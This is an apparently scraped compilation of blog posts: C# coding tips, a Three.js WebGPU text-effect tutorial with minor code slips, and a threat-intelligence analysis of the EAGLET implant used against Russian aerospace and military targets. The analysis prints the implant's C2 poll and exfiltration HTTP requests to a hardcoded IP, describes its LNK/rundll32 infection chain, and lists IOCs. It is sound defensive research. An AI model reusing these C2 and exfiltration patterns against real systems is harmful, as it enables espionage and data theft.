نویسنده: post Bina

  • Access items from the end of the array using the ^ operator | Code4IT

    Access items from the end of the array using the ^ operator | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Say that you have an array of N items and you need to access an element counting from the end of the collection.

    Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[values.Length - 3];
    

    As you can see, we are accessing the same variable twice in a row: values[values.Length - 3].

    We can simplify that specific line of code by using the ^ operator:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[^3];
    

    Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, they are perfectly identical. IL is quite difficult to read and understand, but you can acknowledge that both syntaxes are equivalent by looking at the decompiled C# code:

    C# decompiled code

    Performance is not affected by this operator, so it’s just a matter of readability.

    Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.

    Pay attention that the position is 1-based!

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    Console.WriteLine(values[^1]); //golf
    Console.WriteLine(values[^0]); //IndexOutOfRangeException
    

    Further readings

    Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!

    🔗 C# Tip: use the @ prefix when a name is reserved

    This article first appeared on Code4IT 🐧

    Wrapping up

    In this article, we’ve learned that just using the right syntax can make our code much more readable.

    But we also learned that not every new addition in the language brings performance improvements to the table.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Format Interpolated Strings | Code4IT

    Format Interpolated Strings | Code4IT


    Interpolated strings are those built with the $ symbol, that you can use to create strings using existing variables or properties. Did you know that you can apply custom formattings to such values?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    As you know, there are many ways to “create” strings in C#. You can use a StringBuilder, you can simply concatenate strings, or you can use interpolated strings.

    Interpolated? WHAT? I’m pretty sure that you’ve already used interpolated strings, even if you did not know the “official” name:

    int age = 31;
    string bio = $"Hi, I'm {age} years old";
    

    That’s it: an interpolated string is one where you can reference a variable or a property within the string definition, using the $ and the {} operators to generate such strings.

    Did you know that you can even format how the interpolated value must be rendered when creating the string? It’s just a matter of specifying the format after the : sign:

    Formatting dates

    The easiest way to learn it is by formatting dates:

    DateTime date = new DateTime(2021,05,23);
    
    Console.WriteLine($"The printed date is {date:yyyy-MM-dd}"); //The printed date is 2021-05-23
    Console.WriteLine($"Another version is {date:yyyy-MMMM-dd}"); //Another version is 2021-May-23
    
    Console.WriteLine($"The default version is {date}"); //The default version is 23/05/2021 00:00:00
    

    Here we have date:yyyy-MM-dd which basically means “format the date variable using the yyyy-MM-dd format”.

    There are, obviously, different ways to format dates, as described on the official documentation. Some of the most useful are:

    • dd: day of the month, in number (from 01 to 31);
    • ddd: abbreviated day name (eg: Mon)
    • dddd: complete day name (eg: Monday)
    • hh: hour in a 12-hour clock (01-> 12)
    • HH: hour in a 24-hour clock (00->23)
    • MMMM: full month day

    and so on.

    Formatting numbers

    Similar to dates, we can format numbers.

    For example, we can format a double number as currency or as a percentage:

    var cost = 12.41;
    Console.WriteLine($"The cost is {cost:C}"); // The cost is £12.41
    
    var variation = -0.254;
    Console.WriteLine($"There is a variation of {variation:P}"); //There is a variation of -25.40%
    

    Again, there are lots of different ways to format numbers:

    • C: currency – it takes the current culture, so it may be Euro, Yen, or whatever currency, depending on the process’ culture;
    • E: exponential number, used for scientific operations
    • P: percentage: as we’ve seen before {1:P} represents 100%;
    • X: hexadecimal

    Further readings

    There are too many formats that you can use to convert a value to a string, and we cannot explore all of them here.

    But still, you can have a look at several ways to format date and time in C#

    🔗 Custom date and time format strings | Microsoft Docs

    and, obviously, to format numbers

    🔗 Standard numeric format strings | Microsoft Docs

    This article first appeared on Code4IT 🐧

    Finally, remember that interpolated strings are not the only way to build strings upon variables; you can (and should!) use string.Format:

    🔗 How to use String.Format – and why you should care about it | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant

    Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant


    Contents

    • Introduction
    • Initial Findings
    • Infection Chain.
    • Technical Analysis
      • Stage 0 – Malicious Email File.
      • Stage 1 – Malicious LNK file.
      • Stage 2 – Looking into the decoy file.
      • Stage 3 – Malicious EAGLET implant.
    • Hunting and Infrastructure.
      • Infrastructural details.
      • Similar campaigns.
    • Attribution
    • Conclusion
    • SEQRITE Protection.
    • IOCs
    • MITRE ATT&CK.

    Introduction

    SEQRITE Labs APT-Team has recently found a campaign, which has been targeting Russian Aerospace Industry. The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations. The entire malware ecosystem involved in this campaign is based on usage of malicious LNK file EAGLET DLL implant, further executing malicious commands and exfiltration of data.

    In this blog, we will explore the technical details of the campaign. we encountered during our analysis. We will examine the various stages of this campaign, starting from deep dive into the initial infection chain to implant used in this campaign, ending with a final overview covering the campaign.

    Initial Findings

    Recently, on 27th of June, our team upon hunting malicious spear-phishing attachments, found a malicious email file, which surfaced on sources like VirusTotal, upon further hunting, we also found a malicious LNK file, which was responsible for execution of the malicious DLL-attachment whose file-type has been masquerading as ZIP-attachment.

    Upon looking into the email, we found the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip is basically a DLL file and upon further hunting, we found another file which is a shortcut [LNK] file, having the same name. Then, we decided to look into the workings of these files.

    Infection Chain

     

    Technical Analysis

    We will break down the analysis of this campaign into three different parts, starting with looking into the malicious EML file, followed by the attachment I.e., the malicious DLL implant and the LNK file.

    Stage 0 – Malicious Email File.

    Well, initially, we found a malicious e-mail file, named as backup-message-10.2.2.20_9045-800282.eml , uploaded from Russian-Federation. Upon, looking into the specifics of the e-mail file.

    We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), from Transport and Logistics Centre regarding a Delivery note.

    Looking in the contents of the email, we found that the message was crafted to deliver the news of recent logistics movement, also referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), the email content also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. As, we already noticed that the threat actor impersonates an individual, we also noticed that there is a malicious attachment, masquerading as ZIP file. Upon downloading, we figured out that it was a malicious DLL implant.

    Apart, from the malicious DLL implant, we also hunted a malicious LNK file, with the same name, we believe has been dropped by another spear-phishing attachment, which is used to execute this DLL implant, which we have termed as EAGLET.

    In the next section, we will look into the malicious LNK file.

    Stage 1 – Malicious LNK File.

    Upon, looking inside the LNK file, we found that it is performing some specific set of tasks which finally executes the malicious DLL file and also spawns a decoy pop-up on the screen. It does this by following manner.

    Initially, it uses powershell.exe binary to run this script in background, which enumerates the masquerading ZIP file, which is the malicious EAGLET implant, then in-case it finds the malicious implant, it executes it via rundll32.exe LOLBIN, else in-case it fails to find it recursively looks for the file under %USERPROFILE% and in-case it finds, it runs it, then, if it fails to find it in that location, it looks tries to look under %TEMP% location.

    Once it has found the DLL implant, it is executed and then extracts a decoy XLS file embedded within the implant, which is performed by reading the XLS file of 59904 bytes which is stored just after the starting 296960 bytes, which is then written under %TEMP% directory with named ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file, in the next section, we will look into the decoy file.

    Stage 2- Looking into the decoy file.

    In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.

    Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.

    Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.

    Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.

    Overall, the decoy is basically about simulating an official Russian container inspection document—specifically, an Equipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts associated with Obltransterminal LLC. In, the next section, we will look into the EAGLET implant.

    Stage 3 – Malicious EAGLET implant.

    Initially, as we saw that the implant and loaded it into a PE-analysis tool, we could confirm that, this is a PE file, with the decoy being stored inside the overlay section, which we already saw previously.

    Next, looking into the exports of this malicious DLL, we looked into the EntryPoint and unfortunately it did not contain anything interesting. Next, looking into the DllEntryPoint which lead us to the DllMain which did contain interesting code, related to malicious behavior.

    The initial interesting function, which basically enumerates info on the target machine.

    In this function, the code goes ahead and creates a unique GUID of the target, which will be used to identify the victim, every time the implant is executed a new GUID is generated, this mimics the behavior of session-id which aids the operator or the threat actor to gain clarity on the target.

     

    Then, it enumerates the computer-name of the target machine along with the hostname and DNS domain name of the target machine. Once it has received it, then it goes ahead and creates a directory known as MicrosoftApppStore under the ProgramData location.

    Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.

    Next, we can see that the implant is using certain Windows networking APIs such as WinHttpOpen to initiate a HTTP session, masquerading under an uncommon looking user-agent string MicrosoftAppStore/2001.0, which then is followed by another API known as WinHtppConnect which tries to connect to the hardcoded command-and-control[C2] server which is 185.225.17.104 over port 80, in case it fails, it keeps on retrying.

    In, case the implants connect to the C2, it forms a URL path which us used to send a GET request to the C2 infrastructure. The entire request body looks something like this:

    GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1Host: 185.225.17.104

    After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain instructions.

    Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.

    Another feature is the download feature, in this implant, which either downloads malicious content from the server or exfiltrating required or interesting files from the target machine. One feature downloads malicious content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As, the C2 is currently down, while this research is being published, the files which had or have been used could not be discovered.

    Later, another functionality irrelevant to this download feature also became quite evident that the implant is basically exfiltrating files from the target machine. The request body looks something like this:

    POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

    Therefore, the features are as follows.

    Feature Trigger Keyword Behavior Purpose
    Command Execution cmd: Executes a shell command received from the C2 server and captures the output Remote Code Execution
    File Download download: Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\ Payload Staging
    Exfiltration (automatic) Sends back the result of command execution or download status to the C2 server via HTTP POST Data Exfiltration

    That sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.

    Hunting and Infrastructure

    Infrastructural details

    In this section, we will look into the infrastructure related artefacts. Initially, the C2, which we found to be 185[.]225[.]17[.]104, which is responsible for connecting to the EAGLET implant. The C2 server is located in Romania under the ASN 39798 of MivoCloud SRL.

    Well, looking into it, we found that a lot of passive DNS records were pointing to historical infrastructure previously associated with the same threat cluster which links to TA505, which have been researched by researchers at BinaryDefense. The DNS records although suggest that similar or recycled infrastructure have been used in this campaign. Also, apart from the infrastructural co-relations with TA505 only in terms of using recycled domains, we also saw some other dodgy domains pointing have DNS records pointing towards this same infrastructure. With high-confidence, we can assure that, the current campaign has no-correlation with TA505, apart from the afore-mentioned information.

    Similar, to the campaign, targeting Aerospace sector, we have also found another campaign, which is targeting Russian Military sector through recruitment themed documents. We found in that campaign, the threat actor used EAGLET implant which connects to the C2, I.e., 188[.]127[.]254[.]44 which is located in Russian under the ASN 56694, belonging to LLC Smart Ape organization.

    Similar Campaigns

    Campaign 1 – Military Themed Targeting

    Initially, we saw the URL body, and many other behavioral artefacts of the implant, which led us to another set of campaigns, with exactly similar implant, used to target Russian Military Recruitment.

    This decoy was extracted from an EAGLET implant which is named as Договор_РН83_изменения.zip which translates to Contract_RN83_Changes , which has been targeting individuals and entities related to Russian Military recruitment. As, we can see that the decoy highlights multiple advantages of serving which includes house-mortgage to pension and many more advantages.

    Campaign 2 – EAGLET implant with no decoy embedded

    As, in the previous campaigns we saw that occasionally, the threat entity drops a malicious LNK, which executes the DLL implant and extracts the decoy present inside the implant’s overlay section, but in this, we also saw an implant, with no such decoy present inside.

    Along, with these, we also saw multiple overlaps of these campaigns having similar target-interests and implant code overlap with the threat entity known as Head Mare which have been targeting Russian speaking entities initially discovered by researchers at Kaspersky.

    Attribution

    Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.

    In our ongoing tracking on UNG0901, we discovered notable similarities and overlaps with threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.

    Key Overlaps Between UNG0901 and Head Mare

    1. Tooling Arsenal:

    Researchers at Kaspersky observed that Head Mare often uses a Golang based backdoor known as PhantomDL, which is often packed using software packer such as UPX, which have very simple yet functional features such as shell , download , upload , exit. Similarly, UNG0901 has also deployed EAGLET implant, which shows similar behavior and has nearly to very similar features such as shell, download, upload etc. which is programmed in C++.

    1. File-Naming technique:

    Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523, similarly in the campaigns which we witnessed by UNG0901, there were filenames with similar style such as Contract_RN83_Changes. And many more file-naming schemes which we found to be similar.

    1. Motivation:

    Head Mare has been targeting important entities related to Russia, whereas UNG0901 has also targeted multiple important entities belonging to Russia.

    Apart from these, there are much additional and strong similarities which reinforce the connection between these two threat entities; therefore, we attribute UNG0901 threat entity shares resources and many other similarities with Head Mare, targeting Russian governmental & non-governmental entities.

    Conclusion

    UNG0901 or Unknown-Group-901 demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare which shows multiple similarities such as decoy-nomenclature and much more.

    SEQRITE Protection

    IOCs

    File-Type FileName SHA-256
    LNK Договор_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
    Транспортная_накладная_ТТН_№391-44_от_26.06.2025.xls.lnk 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
    DLL Договор_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
    Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
    N/A b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
    Договор_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
    Decoy[XLS/ PDF] temp.pdf 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
    sample_extracted.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
    80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
    sample_extracted.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
    sample_extracted.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
    sample_extracted.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
    sample_extracted.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
    Email-File backup-message-10.2.2.20_9045-800282.eml ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

    MITRE ATT&CK

    Tactic Technique ID Details
    Initial Access Spearphishing Attachment T1566.001 Malicious .EML file sent to VASO employee, impersonating a logistics center with TTN document lure.
    Execution System Binary Proxy Execution: Rundll32 T1218.011 DLL implant executed via trusted rundll32.exe LOLBIN, called from the .LNK file.
    PowerShell T1059.001 Used for locating and launching the DLL implant from multiple fallback directories.
    Persistence Implant in ZIP-disguised DLL [Custom] DLL masquerades as .ZIP file — persistence implied via operator-controlled executions.
    Defense Evasion Masquerading T1036 Implant disguised as ZIP, decoy XLS used to simulate sanctioned logistics paperwork.
    Discovery System Information Discovery T1082 Gathers hostname, computer name, domain; creates victim GUID to identify target.
    Domain Trust Discovery T1482 Enumerates victim’s DNS domain for network profiling.
    Command & Control Application Layer Protocol: HTTP T1071.001 Communicates with C2 via HTTP; uses MicrosoftAppStore/2001.0 User-Agent.
    Collection Data from Local System T1005 Exfiltrates system details and file contents as per threat actor’s command triggers.
    Exfiltration Exfiltration Over C2 Channel T1041 POST requests to /result endpoint on C2 with encoded command results or exfiltrated data.
    Impact Data Exfiltration T1537 Targeted data theft from Russian aerospace sector.

    Authors:

    Subhajeet Singha

    Sathwik Ram Prakki



    Source link

  • How to download an online file and store it on file system with C# &vert; Code4IT

    How to download an online file and store it on file system with C# | Code4IT


    Downloading a file from a remote resource seems an easy task: download the byte stream and copy it to a local file. Beware of edge cases!

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Downloading files from an online source and saving them on the local machine seems an easy task.

    And guess what? It is!

    In this article, we will learn how to download an online file, perform some operations on it – such as checking its file extension – and store it in a local folder. We will also learn how to deal with edge cases: what if the file does not exist? Can we overwrite existing files?

    How to download a file stream from an online resource using HttpClient

    Ok, this is easy. If you have the file URL, it’s easy to just download it using HttpClient.

    HttpClient httpClient = new HttpClient();
    Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
    

    Using HttpClient can cause some trouble, especially when you have a huge computational load. As a matter of fact, using HttpClientFactory is preferred, as we’ve already explained in a previous article.

    But, ok, it looks easy – way too easy! There are two more parts to consider.

    How to handle errors while downloading a stream of data

    You know, shit happens!

    There are at least 2 cases that stop you from downloading a file: the file does not exist or the file requires authentication to be accessed.

    In both cases, an HttpRequestException exception is thrown, with the following stack trace:

    at System.Net.Http.HttpResponseMessage.EnsureSuccessStatusCode()
    at System.Net.Http.HttpClient.GetStreamAsyncCore(HttpRequestMessage request, CancellationToken cancellationToken)
    

    As you can see, we are implicitly calling EnsureSuccessStatusCode while getting the stream of data.

    You can tell the consumer that we were not able to download the content in two ways: throw a custom exception or return Stream.Null. We will use Stream.Null for the sake of this article.

    Note: always throw custom exceptions and add context to them: this way, you’ll add more useful info to consumers and logs, and you can hide implementation details.

    So, let me refactor the part that downloads the file stream and put it in a standalone method:

    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (Exception ex)
        {
            return Stream.Null;
        }
    }
    

    so that we can use Stream.Null to check for the existence of the stream.

    How to store a file in your local machine

    Now we have our stream of data. We need to store it somewhere.

    We will need to copy our input stream to a FileStream object, placed within a using block.

    using (FileStream outputFileStream = new FileStream(path, FileMode.Create))
    {
        await fileStream.CopyToAsync(outputFileStream);
    }
    

    Possible errors and considerations

    When creating the FileStream instance, we have to pass the constructor both the full path of the image, with also the file name, and FileMode.Create, which tells the stream what type of operations should be supported.

    FileMode is an enum coming from the System.IO namespace, and has different values. Each value fits best for some use cases.

    public enum FileMode
    {
        CreateNew = 1,
        Create,
        Open,
        OpenOrCreate,
        Truncate,
        Append
    }
    

    Again, there are some edge cases that we have to consider:

    • the destination folder does not exist: you will get an DirectoryNotFoundException exception. You can easily fix it by calling Directory.CreateDirectory to generate all the hierarchy of folders defined in the path;
    • the destination file already exists: depending on the value of FileMode, you will see a different behavior. FileMode.Create overwrites the image, while FileMode.CreateNew throws an IOException in case the image already exists.

    Full Example

    It’s time to put the pieces together:

    async Task DownloadAndSave(string sourceFile, string destinationFolder, string destinationFileName)
    {
        Stream fileStream = await GetFileStream(sourceFile);
    
        if (fileStream != Stream.Null)
        {
            await SaveStream(fileStream, destinationFolder, destinationFileName);
        }
    }
    
    async Task<Stream> GetFileStream(string fileUrl)
    {
        HttpClient httpClient = new HttpClient();
        try
        {
            Stream fileStream = await httpClient.GetStreamAsync(fileUrl);
            return fileStream;
        }
        catch (Exception ex)
        {
            return Stream.Null;
        }
    }
    
    async Task SaveStream(Stream fileStream, string destinationFolder, string destinationFileName)
    {
        if (!Directory.Exists(destinationFolder))
            Directory.CreateDirectory(destinationFolder);
    
        string path = Path.Combine(destinationFolder, destinationFileName);
    
        using (FileStream outputFileStream = new FileStream(path, FileMode.CreateNew))
        {
            await fileStream.CopyToAsync(outputFileStream);
        }
    }
    

    Bonus tips: how to deal with file names and extensions

    You have the file URL, and you want to get its extension and its plain file name.

    You can use some methods from the Path class:

    string image = "https://website.come/csharptips/format-interpolated-strings/featuredimage.png";
    Path.GetExtension(image); // .png
    Path.GetFileNameWithoutExtension(image); // featuredimage
    

    But not every image has a file extension. For example, Twitter cover images have this format: https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080×360

    string image = "https://pbs.twimg.com/profile_banners/1164441929679065088/1668758793/1080x360";
    Path.GetExtension(image); // [empty string]
    Path.GetFileNameWithoutExtension(image); // 1080x360
    

    Further readings

    As I said, you should not instantiate a new HttpClient() every time. You should use HttpClientFactory instead.

    If you want to know more details, I’ve got an article for you:

    🔗 C# Tip: use IHttpClientFactory to generate HttpClient instances | Code4IT

    This article first appeared on Code4IT 🐧

    Wrapping up

    This was a quick article, quite easy to understand – I hope!

    My main point here is that not everything is always as easy as it seems – you should always consider edge cases!

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Interactive Text Destruction with Three.js, WebGPU, and TSL

    Interactive Text Destruction with Three.js, WebGPU, and TSL



    When Flash was taken from us all those years ago, it felt like losing a creative home — suddenly, there were no tools left for building truly interactive experiences on the web. In its place, the web flattened into a static world of HTML and CSS.

    But those days are finally behind us. We’re picking up where we left off nearly two decades ago, and the web is alive again with rich, immersive experiences — thanks in large part to powerful tools like Three.js.

    I’ve been working with images, video, and interactive projects for 15 years, using things like Processing, p5.js, OpenFrameworks, and TouchDesigner. Last year, I added Three.js to the mix as a creative tool, and I’ve been loving the learning process. That ongoing exploration leads to little experiments like the one I’m sharing in this tutorial.

    Project Structure

    The structure of our script is going to be simple: one function to preload assets, and another one to build the scene.

    Since we’ll be working with 3D text, the first thing we need to do is load a font in .json format — the kind that works with Three.js.

    To convert a .ttf font into that format, you can use the Facetype.js tool, which generates a .typeface.json file.

    const Resources = {
    	font: null
    };
    
    function preload() {
    
    	const _font_loader = new FontLoader();
    	_font_loader.load( "../static/font/Times New Roman_Regular.json", ( font ) => {
    
    		Resources.font = font;
    		init();
    
    	} );
    
    }
    
    function init() {
    
    }
    
    window.onload = preload;

    Scene setup & Environment

    A classic Three.js scene — the only thing to keep in mind is that we’re working with Three Shader Language (TSL), which means our renderer needs to be a WebGPURenderer.

    const scene = new THREE.Scene();
    const camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);
    const renderer = new THREE.WebGPURenderer({ antialias: true });
    
    document.body.appendChild(renderer.domElement);
    
    renderer.setSize(window.innerWidth, window.innerHeight);
    camera.position.z = 5;
    
    scene.add(camera);

    Next, we’ll set up the scene environment to get some lighting going.

    To keep things simple and avoid loading more assets, we’ll use the default RoomEnvironment that “comes” with Three.js. We’ll also add a DirectionalLight to the scene.

    const environment = new RoomEnvironment();
    const pmremGenerator = new THREE.PMREMGenerator(renderer);
    scene.environment = pmremGenerator.fromSceneAsync(environment).texture;
    
    scene.environmentIntensity = 0.8;
    
    const   light = new THREE.DirectionalLight("#e7e2ca",5);
    light.position.x = 0.0;
    light.position.y = 1.2;
    light.position.z = 3.86;
    
    scene.add(light);

    TextGeometry

    We’ll use TextGeometry, which lets us create 3D text in Three.js.

    It uses a JSON font file (which we loaded earlier with FontLoader) and is configured with parameters like size, depth, and letter spacing.

    const text_geo = new TextGeometry("NUEVOS",{
        font:Resources.font,
        size:1.0,
        depth:0.2,
        bevelEnabled: true,
        bevelThickness: 0.1,
        bevelSize: 0.01,
        bevelOffset: 0,
        bevelSegments: 1
    }); 
    
    const mesh = new THREE.Mesh(
        text_geo,
        new THREE.MeshStandardMaterial({ 
            color: "#656565",
            metalness: 0.4, 
            roughness: 0.3
        })
    );
    
    scene.add(mesh);

    By default, the origin of the text sits at (0, 0), but we want it centered.
    To do that, we need to compute its BoundingBox and manually apply a translation to the geometry:

    text_geo.computeBoundingBox();
    const centerOffset = - 0.5 * ( text_geo.boundingBox.max.x - text_geo.boundingBox.min.x );
    const centerOffsety = - 0.5 * ( text_geo.boundingBox.max.y - text_geo.boundingBox.min.y );
    text_geo.translate( centerOffset, centerOffsety, 0 );

    Now that we have the mesh and material ready, we can move on to the function that lets us blow everything up 💥

    Three Shader Language

    I really love TSL — it’s closed the gap between ideas and execution, in a context that’s not always the friendliest… shaders.

    The effect we’re going to implement deforms the geometry’s vertices based on the pointer’s position, and uses spring physics to animate those deformations in a dynamic way.

    But before we get to that, let’s grab a few attributes we’ll need to make everything work properly:

    //  Original position of each vertex — we’ll use it as a reference
    //  so unaffected vertices can "return" to their original spot
    const initial_position = storage( text_geo.attributes.position, "vec3", count );
    
    //  Normal of each vertex — we’ll use this to know which direction to "push" in
    const normal_at = storage( text_geo.attributes.normal, "vec3", count );
    
    //  Number of vertices in the geometry
    const count = text_geo.attributes.position.count;

    Next, we’ll create a storage buffer to hold the simulation data — and we’ll also write a function.
    But not a regular JavaScript function — this one’s a compute function, written in the context of TSL.

    It runs on the GPU and we’ll use it to set up the initial values for our buffers, getting everything ready for the simulation.

    // In this buffer we’ll store the modified positions of each vertex —
    // in other words, their current state in the simulation.
    const   position_storage_at = storage(new THREE.StorageBufferAttribute(count,3),"vec3",count);   
    
    const compute_init = Fn( ()=>{
    
    	position_storage_at.element( instanceIndex ).assign( initial_position.element( instanceIndex ) );
    
    } )().compute( count );
    
    // Run the function on the GPU. This runs compute_init once per vertex.
    renderer.computeAsync( compute_init );

    Now we’re going to create another one of these functions — but unlike the previous one, this one will run inside the animation loop, since it’s responsible for updating the simulation on every frame.

    This function runs on the GPU and needs to receive values from the outside — like the pointer position, for example.

    To send that kind of data to the GPU, we use what’s called uniforms. They work like bridges between our “regular” code and the code that runs inside the GPU shader.

    They’re defined like this:

    const u_input_pos = uniform(new THREE.Vector3(0,0,0));
    const u_input_pos_press = uniform(0.0);

    With this, we can calculate the distance between the pointer position and each vertex of the geometry.

    Then we clamp that value so the deformation only affects vertices within a certain radius.
    To do that, we use the step function — it acts like a threshold, and lets us apply the effect only when the distance is below a defined value.

    Finally, we use the vertex normal as a direction to push it outward.

    const compute_update = Fn(() => {
    
        // Original position of the vertex — also its resting position
        const base_position = initial_position.element(instanceIndex);
    
        // The vertex normal tells us which direction to push
        const normal = normal_at.element(instanceIndex);
    
        // Current position of the vertex — we’ll update this every frame
        const current_position = position_storage_at.element(instanceIndex);
    
        // Calculate distance between the pointer and the base position of the vertex
        const distance = length(u_input_pos.sub(base_position));
    
        // Limit the effect's range: it only applies if distance is less than 0.5
        const pointer_influence = step(distance, 0.5).mul(1.0);
    
        // Compute the new displaced position along the normal.
        // Where pointer_influence is 0, there’ll be no deformation.
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
    
        // Assign the new position to update the vertex
        current_position.assign(disorted_pos);
    
    })().compute(count);
    

    To make this work, we’re missing two key steps: we need to assign the buffer with the modified positions to the material, and we need to make sure the renderer runs the compute function on every frame inside the animation loop.

    // Assign the buffer with the modified positions to the material
    mesh.material.positionNode = position_storage_at.toAttribute();
    
    // Animation loop
    function animate() {
    	// Run the compute function
    	renderer.computeAsync(compute_update_0);
    
    	// Render the scene
    	renderer.renderAsync(scene, camera);
    }

    Right now the function doesn’t produce anything too exciting — the geometry moves around in a kinda clunky way. We’re about to bring in springs, and things will get much better.

    // Spring — how much force we apply to reach the target value
    velocity += (target_value - current_value) * spring;
    
